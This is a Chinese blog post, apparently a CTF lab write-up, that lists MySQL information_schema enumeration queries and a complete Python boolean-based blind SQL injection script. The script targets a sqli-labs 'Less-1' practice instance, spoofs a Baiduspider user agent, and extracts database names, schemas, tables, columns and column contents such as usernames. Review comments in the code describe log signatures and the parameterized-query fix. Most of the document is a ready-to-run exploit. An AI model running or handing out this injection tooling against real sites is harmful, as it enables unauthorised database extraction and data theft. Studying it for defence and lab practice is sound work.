mysql bool盲注
2022-08-03 03:52:00 【[email protected]】
MySQL中查询所有数据库名和表名
1.查询所有数据库
show databases;
(select group_concat(schema_name) from information_schema.schemata)
2.查询指定数据库中所有表名
(select group_concat(table_name) from information_schema.tables where table_schema=database())
3.查询指定表中的所有字段名
(select group_concat(column_name) from information_schema.columns where table_name='表名')
4.查询指定字段中的内容
(select group_concat(字段名) from 数据库.表名) ,(select group_concat(username) from security.users)
group_concat(字段) from (表名)
import requests
from urllib.parse import quote
# NOTE(review): this script is boolean-based blind SQL injection tooling aimed at
# what looks like a deliberately vulnerable lab instance (the "/Less-1/" path on a
# CTF host). From the defensive side every probe below is a GET to the same
# endpoint whose query string carries "and length(database())=" or
# "and ascii(substr(" followed by a digit, hundreds of times in a row -- an easy
# request-log / WAF signature. The root-cause fix on the server is a parameterized
# query, so the appended " and ..." text is never parsed as SQL.

# Shared HTTP session. Only Database_length() below actually uses it; the other
# probes call requests.get() directly, so no cookies are carried between them.
session = requests.session()
# url = "http://61.147.171.105:62055/view.php?no=1"
# Target URL with the injection point already followed by a closing single quote;
# each probe appends its own " and ... #" clause to this string.
url="http://35bc1ed6-1ac7-4e98-8a8f-becd773b3277.node4.buuoj.cn/Less-1/?id=1'" # the quote-closing style is reflected here
# Crawler-style request headers
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
'Referer': "http://www.baidu.com/"
}
# Browser-style request headers (alternative set, currently commented out)
# headers = {
# 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
# 'Referer': "https://creator.douyin.com/"
# }
# Marker text used to decide whether an injected condition evaluated true.
# Its presence in the response body is the single bit every probe keys off.
success_text="Your Login name"
#爆当前数据库名长度
def Database_length():
    """Infer the length of the current database name by boolean probing.

    Sends one GET per candidate length in 1..9 with
    `and length(database())=<i>#` appended to `url`; the first response
    that contains `success_text` fixes the length and stops the loop.
    Lengths of 10 or more are never tried (range(1, 10)), in which case
    database_length stays 0. The result is printed, not returned.
    """
    database_length=0
    for i in range(1,10):
        payload = quote(" and length(database())="+str(i)+"#")# URL-encode the special characters
        text=session.get(url+payload,headers=headers).text
        if success_text in text:
            database_length=i
            break
    print("database_length:",database_length)
# 爆当前数据库名字
def Database_name():
    """Recover the current database name one character at a time.

    For each position i in 1..99 a binary search over the printable ASCII
    range 32..126 is run. Each step issues two probes: an equality probe
    (`ascii(substr(database(), i, 1)) = mid`) that, when `success_text`
    appears, appends chr(mid) and ends the search for this position, and a
    greater-than probe that narrows `left`/`right`. The inner `while (1)`
    exits only on a successful equality probe; there is no exit path when
    no value in 32..126 matches (e.g. once i is past the end of the name),
    so the function does not return on its own in that case.
    Partial output is printed after every recovered character.
    """
    database_name=""
    for i in range(1,100):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            # Probe 1: is the character at position i exactly `mid`?
            payload1 =" and ascii(substr(database(), " + str(i) + ", 1)) = " + str(mid)+"#"
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                database_name+=chr(mid)
                print(database_name)
                break
            # Probe 2: is it greater than `mid`? Decides which half to keep.
            payload2 = quote(" and ascii(substr(database(), " + str(i) + ", 1)) > " + str(mid)+"#")
            text2 = requests.get(url+payload2 , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("database_name:", database_name)
# 爆数据库名
def Databases_names():
    """Recover the comma-joined list of all schema names, character by character.

    Same two-probe binary search as Database_name(), but the target
    expression is `group_concat(schema_name)` from information_schema.schemata
    and up to 999 positions are walked. The inner `while (1)` exits only
    when an equality probe succeeds; nothing stops the loop if no value in
    32..126 matches at some position. Each probe is a separate GET built
    with %-formatting of the position and the candidate code point.
    Partial output is printed after every recovered character.
    """
    databases_names=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            # Equality probe for position i.
            payload1 = " and (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d # "%(i,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                databases_names+=chr(mid)
                print(databases_names)
                break
            # Greater-than probe narrows the search interval.
            payload2 = " and (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d # "%(i,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("databases_names:",databases_names)
# 爆表名
def Tables_name(database_name):
    """Recover the comma-joined table names of one schema, character by character.

    Args:
        database_name: schema name spliced verbatim (single-quoted) into the
            `where table_schema = '%s'` clause of both probes.

    Follows the same two-probe binary search over ASCII 32..126 as
    Databases_names(), reading `group_concat(table_name)` from
    information_schema.tables for up to 999 positions. The inner `while (1)`
    exits only on a successful equality probe. Partial output is printed
    after every recovered character; nothing is returned.
    """
    tables_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            # Equality probe for position i.
            payload1 = " and (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d # "%(i,database_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                tables_name+=chr(mid)
                print(tables_name)
                break
            # Greater-than probe narrows the search interval.
            payload2 = " and (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d # "%(i,database_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("tables_names:",tables_name)
# 爆列名
def Columns_name(table_name):
    """Recover the comma-joined column names of one table, character by character.

    Args:
        table_name: table name spliced verbatim (single-quoted) into the
            `where table_name = '%s'` clause of both probes. Note the query
            is not restricted by schema, so same-named tables in other
            schemas contribute to the result as well.

    Same two-probe binary search over ASCII 32..126 as Tables_name(),
    reading `group_concat(column_name)` from information_schema.columns
    for up to 999 positions. The inner `while (1)` exits only on a
    successful equality probe. Nothing is returned.
    """
    columns_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            # Equality probe for position i.
            payload1 = " and (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d # "%(i,table_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                columns_name+=chr(mid)
                print(columns_name)
                break
            # Greater-than probe narrows the search interval.
            payload2 = " and (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d # "%(i,table_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    # The label still says "tables_names" (copied from Tables_name); the value printed is columns_name.
    print("tables_names:",columns_name)
# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name,table_name,columns_name):
    """Recover the comma-joined values of one column, character by character.

    Args:
        database_name: schema name, interpolated unquoted as the `%s.%s`
            qualifier of the FROM clause.
        table_name: table name, interpolated unquoted after the schema.
        columns_name: column expression placed inside `group_concat(%s)`;
            all three arguments are pasted into the SQL text as-is.

    Same two-probe binary search over ASCII 32..126 as the other helpers,
    for up to 999 positions. The inner `while (1)` exits only on a
    successful equality probe. Partial output is printed after every
    recovered character; nothing is returned.
    """
    dump=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            # Equality probe for position i.
            payload1 = " and (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d # "%(columns_name,i,database_name,table_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                dump+=chr(mid)
                print(dump)
                break
            # Greater-than probe narrows the search interval.
            payload2 = " and (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d # "%(columns_name,i,database_name,table_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("dump:",dump)
# Driver section: exactly one step is enabled at a time; the others are kept
# commented out and run by hand with the values recovered in the previous step.
# Length of the current database name
# Database_length()
# Name of the current database
# Database_name()
# Names of all databases (the only call active in this revision)
Databases_names()
# Table names of a given database
# argument: database name
# Tables_name("security")
# Column names of a given table
# argument: table name
# Columns_name("emails")
# Contents for the given database, table and column
# Dump("security","users","username")
版权声明
本文为[[email protected]]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_61774705/article/details/126119974